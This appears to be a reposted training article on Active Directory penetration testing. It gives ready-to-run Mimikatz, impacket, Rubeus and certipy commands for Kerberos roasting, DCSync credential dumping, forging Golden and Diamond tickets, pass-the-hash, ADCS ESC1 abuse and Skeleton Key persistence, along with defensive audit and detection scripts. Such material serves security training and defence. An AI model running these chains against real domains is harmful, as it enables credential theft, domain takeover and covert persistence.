Master Active Directory Penetration Testing: From Kerberos Abuse to Diamond Tickets – Your Ultimate Training Guide + Video

Introduction:

Active Directory (AD) remains the primary authentication and authorization hub for most enterprise networks, making it a prime target for attackers. A single misconfiguration or weak Kerberos ticket can lead to full domain compromise, as demonstrated by techniques like Golden Ticket and DCSync. This article distills advanced AD penetration testing concepts from a professional training program, providing hands-on commands, attack walkthroughs, and defensive insights across Linux and Windows environments.

Learning Objectives:

  • Execute initial AD enumeration and exploitation using tools like BloodHound, SharpHound, and ldapsearch.
  • Abuse Kerberos authentication (AS-REP Roasting, Kerberoasting) and craft Diamond/Sapphire tickets.
  • Perform credential dumping, privilege escalation, lateral movement, and DACL/ADCS attacks.

You Should Know:

1. Initial Active Directory Exploitation & Post‑Enumeration

Before any attack, you must map the AD environment. Start with unauthenticated LDAP queries or a low-privilege domain user.

Linux commands (using impacket and ldapsearch):

# Enumerate domain users without creds (only works if the DC allows anonymous/null bind)
ldapsearch -x -H ldap://<DC-IP> -b "DC=example,DC=com" -s sub "(objectClass=user)" | grep sAMAccountName

# Using impacket's GetADUsers.py with credentials
GetADUsers.py -all <domain>/<user>:'<password>' -dc-ip <DC-IP>

# BloodHound ingestor for Linux (use SharpHound on Windows), then import the output into BloodHound
bloodhound-python -d <domain> -u <user> -p '<password>' -ns <DC-IP> -c All

Windows PowerShell (as domain user):

# AD module enumeration (RSAT ActiveDirectory module)
Get-ADUser -Filter * -Properties * | Select-Object SamAccountName, MemberOf
Get-ADGroup -Filter * | Select-Object Name, GroupCategory

# SharpHound collector
.\SharpHound.exe -c All --domain <domain> --ldapusername <user> --ldappassword '<password>'

Step‑by‑step guide:

  1. Obtain a domain user account (e.g., via phishing or a service account).
  2. Run BloodHound to identify attack paths – look for “Shortest Path to Domain Admin”.
  3. Use `ldapsearch` or `ADSI` to find users with Kerberos pre‑authentication not required (the DONT_REQ_PREAUTH bit of `userAccountControl`; these are AS‑REP roastable).
  4. Enumerate SMB shares (and RDP access) with crackmapexec:
     crackmapexec smb <IP-range> -u <user> -p '<password>' --shares
    
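To see which of those enumeration results actually matter, here is an added example (not code from the training program or from any tool it names) that audits an exported user list for the AS‑REP roastable and Kerberoastable conditions the steps above describe, plus accounts limited to RC4 Kerberos keys. The `SAMPLE_USERS` export and every account name in it are constructed for the example; the bit values are the documented ones for the `userAccountControl` and `msDS-SupportedEncryptionTypes` attributes.

```python
"""Audit an Active Directory user export for AS-REP roastable and
Kerberoastable accounts and for weak Kerberos encryption settings.

Added example: it decodes the same userAccountControl bits that
ldapsearch / GetNPUsers rely on, but from a defender's seat and over a
constructed export instead of a live domain controller.
"""

# userAccountControl bit flags (documented AD schema values)
UAC_ACCOUNTDISABLE = 0x0002
UAC_NORMAL_ACCOUNT = 0x0200
UAC_DONT_REQ_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits
ENC_RC4 = 0x4
ENC_AES128 = 0x8
ENC_AES256 = 0x10

# Constructed sample export (shape of an ldapsearch / Get-ADUser dump; all names are made up)
SAMPLE_USERS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200, "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200, "servicePrincipalName": ["MSSQLSvc/sql01.example.com:1433"], "msDS-SupportedEncryptionTypes": 0x4},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x400200, "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202, "servicePrincipalName": ["HTTP/old.example.com"], "msDS-SupportedEncryptionTypes": 0x4},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202, "servicePrincipalName": ["kadmin/changepw"], "msDS-SupportedEncryptionTypes": 0x1c},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000, "servicePrincipalName": ["HOST/ws01.example.com"], "msDS-SupportedEncryptionTypes": 0x1c},
]


def audit_account(user):
    """Return a list of finding strings for one account (empty if nothing to report)."""
    findings = []
    uac = user["userAccountControl"]
    name = user["sAMAccountName"]
    if uac & UAC_ACCOUNTDISABLE:
        return findings  # disabled accounts cannot be roasted; skip them
    if uac & UAC_DONT_REQ_PREAUTH:
        findings.append("AS-REP roastable (DONT_REQ_PREAUTH set)")
    spns = user.get("servicePrincipalName") or []
    # Kerberoasting targets user accounts with SPNs. Machine accounts (name$) have long random
    # passwords and krbtgt is a special case, so neither is reported.
    if spns and not name.endswith("$") and name.lower() != "krbtgt":
        findings.append("Kerberoastable (user account with SPN)")
    enc = user.get("msDS-SupportedEncryptionTypes")
    if enc is None or enc == 0:
        findings.append("no explicit encryption types (DC default applies; confirm AES is enforced)")
    elif enc & ENC_RC4 and not enc & (ENC_AES128 | ENC_AES256):
        findings.append("RC4-only Kerberos keys (no AES)")
    return findings


def audit(users):
    """Map sAMAccountName -> findings for every account that has at least one."""
    report = {}
    for u in users:
        f = audit_account(u)
        if f:
            report[u["sAMAccountName"]] = f
    return report


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_USERS).items():
        print(f"{name}:")
        for f in findings:
            print(f"  - {f}")
```

Point `audit()` at the parsed output of the `ldapsearch` or `Get-ADUser` commands above and the two accounts to fix first fall out immediately: the service account with an SPN and RC4‑only keys, and the application account that skips pre‑authentication.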

2. Abusing Kerberos: AS‑REP Roasting, Kerberoasting, and Ticket Attacks

Kerberos misconfigurations let attackers request service tickets that can be cracked offline, or forge high‑privilege tickets outright.

AS‑REP Roasting (no pre‑auth):

# Linux: impacket-GetNPUsers
impacket-GetNPUsers -dc-ip <DC-IP> <domain>/<user> -request -format hashcat

# Windows: Rubeus
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

Kerberoasting (crack service account hashes):

# Linux
impacket-GetUserSPNs -dc-ip <DC-IP> <domain>/<user> -request -outputfile kerb.txt

# Windows
Rubeus.exe kerberoast /outfile:kerb.txt

Crack with hashcat (`-m 13100` for RC4/etype 23 service tickets, `-m 19600` for AES128/etype 17; AES256/etype 18 tickets need `-m 19700`, and AS‑REP hashes use `-m 18200`) or John.
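
From the defender's side, the tickets requested during AS‑REP roasting and Kerberoasting land in the domain controller's Security log as events 4768 and 4769. The following added example (not from the training material or any tool it names) runs three checks over a constructed batch of such records: RC4 service tickets for user SPNs, one account requesting many distinct services in a short window, and AS‑REQs without pre‑authentication. `SAMPLE_EVENTS`, the thresholds and all names and IPs are assumptions made for the example; the field names follow the Windows event schema.

```python
"""Flag Kerberoasting / AS-REP roasting patterns in Kerberos audit events.

Added example. It runs over constructed Security-log records (field names as
in Windows events 4768/4769, values as Windows renders them) and applies the
three checks a SOC typically wires up for these techniques.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # TicketEncryptionType for RC4-HMAC (etype 23)
BURST_WINDOW = timedelta(minutes=5)
BURST_THRESHOLD = 5            # distinct user services in the window -> roasting sweep

# Constructed sample events (timestamps, principals and IPs are made up)
SAMPLE_EVENTS = [
    {"EventID": 4769, "Time": "2024-03-01T09:00:01", "TargetUserName": "bob@EXAMPLE.COM", "ServiceName": "WS01$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.5"},
    {"EventID": 4769, "Time": "2024-03-01T09:00:02", "TargetUserName": "bob@EXAMPLE.COM", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5"},
    {"EventID": 4769, "Time": "2024-03-01T09:00:03", "TargetUserName": "bob@EXAMPLE.COM", "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5"},
    {"EventID": 4769, "Time": "2024-03-01T09:00:04", "TargetUserName": "bob@EXAMPLE.COM", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5"},
    {"EventID": 4769, "Time": "2024-03-01T09:00:05", "TargetUserName": "bob@EXAMPLE.COM", "ServiceName": "svc_mon", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5"},
    {"EventID": 4769, "Time": "2024-03-01T09:00:06", "TargetUserName": "bob@EXAMPLE.COM", "ServiceName": "svc_print", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5"},
    {"EventID": 4769, "Time": "2024-03-01T09:30:00", "TargetUserName": "alice@EXAMPLE.COM", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.7"},
    {"EventID": 4768, "Time": "2024-03-01T09:31:00", "TargetUserName": "legacy_app", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "PreAuthType": "0", "IpAddress": "::ffff:10.0.0.9"},
    {"EventID": 4768, "Time": "2024-03-01T09:32:00", "TargetUserName": "alice", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "::ffff:10.0.0.7"},
]


def is_user_spn(service):
    """True for service tickets to user accounts; machine accounts (name$) and krbtgt are not roasting targets."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect(events):
    """Return a list of (rule, principal, detail) alerts."""
    alerts = []
    tgs_by_user = defaultdict(list)  # principal -> [(time, service)]
    for e in events:
        t = datetime.fromisoformat(e["Time"])
        if e["EventID"] == 4769 and is_user_spn(e["ServiceName"]):
            # Rule 1: an RC4 service ticket for a user SPN is exactly what hashcat mode 13100 consumes
            if e["TicketEncryptionType"] == RC4_HMAC:
                alerts.append(("rc4_tgs_for_user_spn", e["TargetUserName"], e["ServiceName"]))
            tgs_by_user[e["TargetUserName"]].append((t, e["ServiceName"]))
        elif e["EventID"] == 4768 and e.get("PreAuthType") == "0":
            # Rule 3: PreAuthType 0 means the AS-REQ carried no pre-authentication (AS-REP roast indicator)
            alerts.append(("as_req_without_preauth", e["TargetUserName"], e["IpAddress"]))
    # Rule 2: sliding window over each principal's distinct service ticket requests
    for user, reqs in tgs_by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - t0 <= BURST_WINDOW}
            if len(services) >= BURST_THRESHOLD:
                alerts.append(("tgs_burst", user, f"{len(services)} distinct services within {BURST_WINDOW}"))
                break
    return alerts


if __name__ == "__main__":
    for rule, who, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {who}: {detail}")
```

Event 4769 only appears when the "Audit Kerberos Service Ticket Operations" subcategory is enabled. RC4 tickets also occur legitimately for accounts that have no AES keys, which is why the burst rule, not the encryption type alone, is what separates a roasting sweep from background noise.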

Diamond & Sapphire Tickets (new in training):

  • Diamond Ticket – Decrypt a legitimate TGT using the KRBTGT hash, then modify the PAC to impersonate any user (including Domain Admin). It bypasses many detection rules because the ticket is properly encrypted.
  • Sapphire Ticket – Similar but uses AES256 keys and includes extra checks.

Step‑by‑step:

  1. Extract the KRBTGT hash via DCSync or an LSASS dump:
     # Using secretsdump.py
     impacket-secretsdump -just-dc <domain>/<admin>:'<password>'@<DC-IP>
  2. Forge a Diamond Ticket with Rubeus:
     Rubeus.exe diamond /krbkey:<KRBTGT_AES256> /user:Administrator /domain:<domain> /dc:<DC-IP> /ptt
  3. Access any resource (e.g., `dir \\DC\c$`) – you are now Domain Admin.

3. Advanced Credential Dumping Attacks

Modern AD penetration requires extracting NTLM hashes, Kerberos keys, and plaintext secrets from memory and NTDS.dit.

Mimikatz (Windows):

privilege::debug
sekurlsa::logonpasswords        # dump credentials cached in LSASS
lsadump::lsa /inject            # extract LSA secrets
lsadump::dcsync /user:krbtgt    # DCSync: pull the krbtgt secret over the replication protocol; nothing is written to the DC

Linux alternatives (impacket):

# DCSync
impacket-secretsdump -just-dc <domain>/<user>:'<password>'@<DC-IP>

# Parse an offline copy of NTDS.dit (e.g., taken from a volume shadow copy) together with the SYSTEM hive
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

Defensive command (detect LSASS access):

# Windows Event 4656 (handle to LSASS requested). It is only generated when object-access auditing is
# configured; many teams rely on Sysmon Event ID 10 (ProcessAccess with TargetImage ending in lsass.exe) instead.
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4656} | Where-Object { $_.Message -like '*lsass.exe*' }

Step‑by‑step guide:

  1. Gain admin on a domain‑joined machine or DC.
  2. Run Mimikatz `sekurlsa::logonpasswords` – often reveals domain admin hashes.
  3. Use DCSync if you have replication rights (e.g., via Exchange AD‑Sync group).
  4. Crack hashes with hashcat (-m 1000 for NTLM) or pass‑the‑hash directly.

4. Privilege Escalation & Lateral Movement Strategies

Once you have one foothold, escalate privileges using misconfigured ACLs, unpatched services, or Kerberos delegation.

Common escalation vectors:

  • Unconstrained delegation – Steal TGTs from admin users connecting to a compromised machine.
  • Constrained delegation abuse – Impersonate users to any service (e.g., CIFS).
  • Local privilege escalation – PrintNightmare, ZeroLogon, or potato attacks.

Lateral movement commands:

# Pass-the-Hash (PsExec)
impacket-psexec -hashes <LM:NTLM> <domain>/<user>@<target-IP>

# WinRM using Evil-WinRM
evil-winrm -i <target-IP> -u <user> -H '<NTLM>'

# Scheduled task lateral movement (the task runs as SYSTEM on the remote host)
schtasks /create /S <target-IP> /SC ONCE /ST 00:00 /TN "update" /TR "calc.exe" /RU "SYSTEM"

Step‑by‑step:

  1. Enumerate local admin privileges on remote machines (`net localgroup administrators` via WMI).
  2. Use `crackmapexec` to test a password/hash spray:
     crackmapexec smb <targets.txt> -u users.txt -H hashes.txt --continue-on-success
  3. Once inside, run `whoami /priv` to check for SeImpersonatePrivilege or SeBackupPrivilege – then use `PrintSpoofer` or JuicyPotato.
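
For the blue‑team view of the commands above: impacket-psexec and a remote `schtasks /create` both need a network logon and ADMIN$ access, and both leave a new service or task behind on the target. The following added example (not part of the training material) correlates those artifacts across constructed Security events 4624, 5140 and 4698 and System event 7045; `SAMPLE_EVENTS`, the 60‑second `WINDOW` and every host, user and IP are assumptions made for the example.

```python
"""Correlate Windows events into a PsExec-style / remote-scheduled-task lateral movement alert.

Added example. Field names follow Security events 4624 (logon), 5140 (share
access) and 4698 (scheduled task created) and System event 7045 (service
installed). An alert fires when a network logon is followed within WINDOW by
ADMIN$ access from the same source and a new service or task on that host.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # how long after the logon to look for the follow-on events

# Constructed sample (hosts, IPs and names are made up)
SAMPLE_EVENTS = [
    # PsExec-like: network logon, ADMIN$ access, then a service with a random-looking name
    {"EventID": 4624, "Time": "2024-03-01T10:00:00", "Host": "FS01", "IpAddress": "10.0.0.5", "LogonType": "3", "AuthenticationPackageName": "NTLM", "TargetUserName": "bob"},
    {"EventID": 5140, "Time": "2024-03-01T10:00:01", "Host": "FS01", "IpAddress": "10.0.0.5", "ShareName": "\\\\*\\ADMIN$", "SubjectUserName": "bob"},
    {"EventID": 7045, "Time": "2024-03-01T10:00:03", "Host": "FS01", "ServiceName": "xqLmZkTa", "ImagePath": "%SystemRoot%\\xqLmZkTa.exe"},
    # a service installed with no preceding remote logon (e.g. a local software install) -> no alert
    {"EventID": 7045, "Time": "2024-03-01T10:30:00", "Host": "FS01", "ServiceName": "BackupAgent", "ImagePath": "C:\\Program Files\\Backup\\agent.exe"},
    # a user mapping an ordinary data share -> no alert
    {"EventID": 4624, "Time": "2024-03-01T11:00:00", "Host": "FS01", "IpAddress": "10.0.0.8", "LogonType": "3", "AuthenticationPackageName": "Kerberos", "TargetUserName": "alice"},
    {"EventID": 5140, "Time": "2024-03-01T11:00:02", "Host": "FS01", "IpAddress": "10.0.0.8", "ShareName": "\\\\*\\Data", "SubjectUserName": "alice"},
    # schtasks-style: network logon, ADMIN$ access, then a task created by the same user
    {"EventID": 4624, "Time": "2024-03-01T12:00:00", "Host": "WS02", "IpAddress": "10.0.0.9", "LogonType": "3", "AuthenticationPackageName": "NTLM", "TargetUserName": "carol"},
    {"EventID": 5140, "Time": "2024-03-01T12:00:01", "Host": "WS02", "IpAddress": "10.0.0.9", "ShareName": "\\\\*\\ADMIN$", "SubjectUserName": "carol"},
    {"EventID": 4698, "Time": "2024-03-01T12:00:05", "Host": "WS02", "SubjectUserName": "carol", "TaskName": "\\update"},
]


def ts(e):
    return datetime.fromisoformat(e["Time"])


def detect(events):
    """Return (rule, host, source_ip, user, artifact) tuples, one per suspicious sequence."""
    evs = sorted(events, key=ts)
    alerts = []
    for logon in (e for e in evs if e["EventID"] == 4624 and e["LogonType"] == "3"):
        t0, host, ip, user = ts(logon), logon["Host"], logon["IpAddress"], logon["TargetUserName"]
        # everything on the same host inside the window after the logon
        window = [e for e in evs if e["Host"] == host and t0 <= ts(e) <= t0 + WINDOW]
        admin_share = any(e["EventID"] == 5140 and e["IpAddress"] == ip
                          and e["ShareName"].upper().endswith("ADMIN$") for e in window)
        if not admin_share:
            continue  # ordinary share access is routine; ADMIN$ is what remote execution tools need
        for e in window:
            if e["EventID"] == 7045:
                alerts.append(("remote_service_install", host, ip, user, e["ServiceName"]))
            elif e["EventID"] == 4698 and e["SubjectUserName"] == user:
                alerts.append(("remote_scheduled_task", host, ip, user, e["TaskName"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Event 5140 needs "Audit File Share" and 4698 needs "Audit Other Object Access Events" enabled, and 7045 lives in the System log rather than Security, so the four sources have to be forwarded together for the correlation to work.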

5. DACL Abuse & ADCS Attacks (New in Training)

Discretionary Access Control Lists (DACLs) are often over‑permissive, allowing a regular user to modify group membership or reset passwords. Active Directory Certificate Services (ADCS) misconfigurations lead to immediate domain admin.

DACL abuse example (Add a user to Domain Admins):

# PowerView (part of PowerSploit)
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity <attacker_user> -Rights WriteMembers
Add-DomainGroupMember -Identity "Domain Admins" -Member <attacker_user>

ADCS attack (ESC1 – vulnerable certificate template):

# Request a certificate with an attacker‑chosen SAN (Subject Alternative Name)
certipy req -ca <CA-Name> -template <VulnTemplate> -upn <target-UPN>

Then use the certificate for Kerberos authentication via `certipy auth` or Rubeus.

Step‑by‑step:

  1. Enumerate ACLs with BloodHound – look for `WriteOwner`, `WriteDacl`, or `GenericAll` on high‑value groups.
  2. Abuse a misconfigured DACL using `Set-ADObject` or PowerView.
  3. For ADCS, run `certipy find` – identify ESC1, ESC2, or ESC8 templates.
  4. Request a certificate for Domain Admin and use `Rubeus asktgt` to obtain a TGT.
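
The conditions that make a template ESC1 or ESC2 can be checked from an LDAP export without touching a CA, which is how a PKI team audits templates before anyone else does. Below is an added example (not code from the training program or from certipy) that applies the published ESC1/ESC2 conditions to template objects whose fields mirror the `pKICertificateTemplate` attributes (`msPKI-Certificate-Name-Flag`, `msPKI-Enrollment-Flag`, `msPKI-RA-Signature`, `pKIExtendedKeyUsage`, enrollment rights). `SAMPLE_TEMPLATES`, its template names and the `enabled` field (meaning published on at least one CA) are constructed for the example.

```python
"""Classify AD CS certificate templates for the ESC1 / ESC2 conditions.

Added example. Field names are simplified mirrors of the pKICertificateTemplate
attributes under CN=Certificate Templates,CN=Public Key Services,CN=Services,
CN=Configuration,... so the same functions can be pointed at a real export.
"""

# msPKI-Certificate-Name-Flag bit: the requester may supply the subject / SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: requests are held for CA manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# Extended key usages that let a certificate authenticate a principal
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
OID_ANY_PURPOSE = "2.5.29.37.0"
AUTH_EKUS = {OID_CLIENT_AUTH, OID_SMARTCARD_LOGON, OID_PKINIT_CLIENT_AUTH, OID_ANY_PURPOSE}

# Principals whose enrollment right makes a template reachable by any domain account
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed templates (names and settings are made up for the example).
# "enabled" stands in for "published on a CA" (the CA object's certificateTemplates attribute).
SAMPLE_TEMPLATES = [
    {"name": "User", "enabled": True, "nameFlag": 0x0, "enrollmentFlag": 0x0, "raSignatures": 0,
     "eku": [OID_CLIENT_AUTH, "1.3.6.1.5.5.7.3.4"], "enrollRights": ["Domain Users"]},
    {"name": "VulnWebServer", "enabled": True, "nameFlag": 0x1, "enrollmentFlag": 0x0, "raSignatures": 0,
     "eku": [OID_CLIENT_AUTH, "1.3.6.1.5.5.7.3.1"], "enrollRights": ["Domain Users"]},
    {"name": "ApprovedAdminCert", "enabled": True, "nameFlag": 0x1, "enrollmentFlag": 0x2, "raSignatures": 0,
     "eku": [OID_CLIENT_AUTH], "enrollRights": ["Domain Users"]},
    {"name": "LegacyAnyPurpose", "enabled": True, "nameFlag": 0x0, "enrollmentFlag": 0x0, "raSignatures": 0,
     "eku": [], "enrollRights": ["Authenticated Users"]},
    {"name": "RetiredTemplate", "enabled": False, "nameFlag": 0x1, "enrollmentFlag": 0x0, "raSignatures": 0,
     "eku": [OID_CLIENT_AUTH], "enrollRights": ["Domain Users"]},
    {"name": "PKIAdminsOnly", "enabled": True, "nameFlag": 0x1, "enrollmentFlag": 0x0, "raSignatures": 0,
     "eku": [OID_CLIENT_AUTH], "enrollRights": ["PKI Admins"]},
]


def low_priv_can_enroll(t):
    return bool(LOW_PRIV_PRINCIPALS & set(t["enrollRights"]))


def no_approval_gate(t):
    """True when neither manager approval nor an authorized signature stands between request and issuance."""
    return not (t["enrollmentFlag"] & CT_FLAG_PEND_ALL_REQUESTS) and t["raSignatures"] == 0


def classify(t):
    """Return the set of ESC labels ('ESC1', 'ESC2') that apply to one template."""
    found = set()
    if not t["enabled"] or not low_priv_can_enroll(t) or not no_approval_gate(t):
        return found  # unpublished, restricted or gated templates are not quick wins
    eku = set(t["eku"])
    if (t["nameFlag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) and eku & AUTH_EKUS:
        found.add("ESC1")  # requester chooses the SAN and the certificate can authenticate
    if not eku or OID_ANY_PURPOSE in eku:
        found.add("ESC2")  # certificate usable for any purpose, enrollment agent included
    return found


def audit(templates):
    """Map template name -> sorted ESC labels for every template with at least one."""
    report = {}
    for t in templates:
        labels = classify(t)
        if labels:
            report[t["name"]] = sorted(labels)
    return report


if __name__ == "__main__":
    for name, labels in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: {', '.join(labels)}")
```

The fix for a flagged template is visible in the same fields: clear the enrollee‑supplies‑subject flag or require manager approval (`ApprovedAdminCert` in the sample shows why that alone removes the finding), and restrict enrollment to the group that actually needs the template.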

6. Persistence Methods

After compromise, ensure you can return. AD offers many persistence vectors beyond a simple backdoor.

Golden Ticket (classic persistence):

# Use the KRBTGT hash to forge a TGT for any user
mimikatz.exe "kerberos::golden /user:Administrator /domain:<domain> /sid:<domain-SID> /krbtgt:<hash> /ptt"

Skeleton Key (Linux‑style backdoor):

# Inject a master password into LSASS on the DC (requires admin on the DC; it lives in memory and does not survive a reboot)
mimikatz.exe "privilege::debug" "misc::skeleton"
# Any user can now also authenticate with the password 'mimikatz'

Other persistence techniques:

  • AdminSDHolder backdoor – add user to `AdminSDHolder` with `WriteDacl` rights, propagates every 60 minutes.
  • Security group monitoring bypass – create a hidden group that grants admin rights.
  • DSRM persistence – set the Directory Services Restore Mode password to a known hash.

Step‑by‑step:

  1. After DA access, extract the KRBTGT hash with DCSync.
  2. Create a Golden Ticket with a 10‑year lifetime.
  3. Test by accessing the DC: `dir \\DC\c$`.
  4. Install a Skeleton Key for fallback (defenders often miss it because LSASS is a legitimate process).

What Undercode Say:

  • Key Takeaway 1: Modern AD penetration is not just about running Mimikatz; it requires chaining techniques like AS-REP roasting, DCSync, and ADCS abuse. Defenders must monitor for unusual Kerberos ticket requests (Event ID 4769) and LDAP query anomalies.
  • Key Takeaway 2: Training courses like the one highlighted (Ignite Technologies) are essential because AD attacks evolve rapidly – Diamond/Sapphire tickets and DACL abuses are now standard in red team toolkits. Hands‑on practice with commands like certipy, Rubeus, and `bloodhound-python` is non‑negotiable for security professionals.

Analysis: The intersection of Kerberos cryptography and Windows ACLs creates a complex attack surface. While Golden Tickets are well‑known, newer techniques like Diamond Tickets bypass many EDRs because they use valid encryption instead of forging the PAC entirely. Meanwhile, ADCS misconfigurations have become the #1 quick‑win for attackers – yet most blue teams still ignore certificate templates. Organizations must prioritize hardening Kerberos (enable AES, disable RC4), put privileged accounts in the Protected Users group, and regularly audit ADCS with tools like `Certify` or PKINITtools.

Prediction:

As Microsoft pushes cloud‑native identity (Entra ID) and Kerberos improvements (e.g., disabling RC4 by default in 2025 updates), attackers will shift focus to hybrid AD scenarios and cross‑tenant trust abuse. However, on‑prem AD will remain a critical target for at least another decade because of legacy systems. We predict a surge in “ADCS as a service” exploits and AI‑driven BloodHound pathfinding – where large language models auto‑generate attack chains from DACL misconfigurations. Blue teams must adopt continuous AD reconnaissance (e.g., Purple Knight, PingCastle) and treat certificate services with the same rigor as domain controllers.

Reported By: Ad Pentest – Hackers Feeds